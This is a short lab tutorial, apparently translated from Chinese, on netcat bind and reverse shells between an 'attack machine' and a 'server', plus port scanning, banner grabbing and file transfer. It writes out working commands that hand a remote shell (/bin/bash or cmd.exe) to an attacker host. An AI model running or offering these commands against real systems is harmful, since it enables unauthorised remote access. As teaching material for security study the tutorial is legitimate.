Netcat rebound shell
Netcat, NC for short, is a simple and reliable network tool, known as the Swiss Army Knife of the network industry. Through NC, you can perform operations such as port scanning, reverse shell, port monitoring and file transfer. The common parameters are as follows:
| parameter | effect |
|---|---|
| -c | Specifies the shell command to execute after connecting |
| -e | Specifies the name of the file to be executed after the connection |
| -k | Configure the Socket to keep alive (you can use this parameter if you do not want to disconnect the listener after exiting the Shell) |
| -l | monitor mode |
| -p | Set the communication port used by the local host |
| -u | Use UDP transport protocol, the default is TCP |
| -v | Display the execution process of the instruction, use -vv to be more detailed |
1. Positive rebound Shell
experimental topology
| Machine name | IP |
|---|---|
| attack machine | 192.168.41.20 |
| server | 192.168.41.130 |
Experiment introduction
The attacker machine 192.168.41.20 and the server 192.168.41.130 can access each other, at this time you can use the forward shell
Experimental reproduction
1) Run on the server:
#windows机器
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe
#linux机器
nc -lvvp 1111 -e /bin/bash
2) Run on the attack aircraft
nc64.exe 192.168.41.130 1111
3) Get the positive shell
2. Reverse bounce Shell
experimental topology
| Machine name | IP |
|---|---|
| attack machine | 192.168.41.20 |
| server | 192.168.41.130 |
Experiment introduction
The attacker's machine 192.168.41.20 cannot directly access the server, but the server 192.168.41.130 can access the attacker's machine. At this time, a reverse shell can be used
Experimental reproduction
1) Run on the attacker machine
#监听1111端口
nc64.exe -lvvp 1111
2) Run on server (bounce to attack machine)
#windos机器
nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111
#linux机器
nc -e /bin/bash 192.168.41.20 1111
3) The attacker gets the reverse shell
3. Other uses of Netcat
Banner capture
The target machine is running the ssh service, you can view the version of the service
nc64.exe -nv IP Port
port detection
You can check the opening of the port, and you can see that port 80 of our target server is not open
nc64.exe -v IP Port
multiport scan
You can check whether multiple ports are open and allowed services
nc -v -z IP Port[1]-Port[65535]
port listening
Listening port, when the port is accessed, the information will be output
nc64.exe -l -p Port
file transfer
| machine | IP |
|---|---|
| Receiver | 192.168.41.132 |
| sender | 192.168.41.20 |
The receiver folder is empty
The receiver executes the command
nc -lp Port > file
The sender executes the command
nc -vn IP Port < file -w 1
Receiver receives the file
easy chat
attack aircraft execution
nc -l -p Port
server execution
nc64.exe -vn IP Port
Attacker receives chat
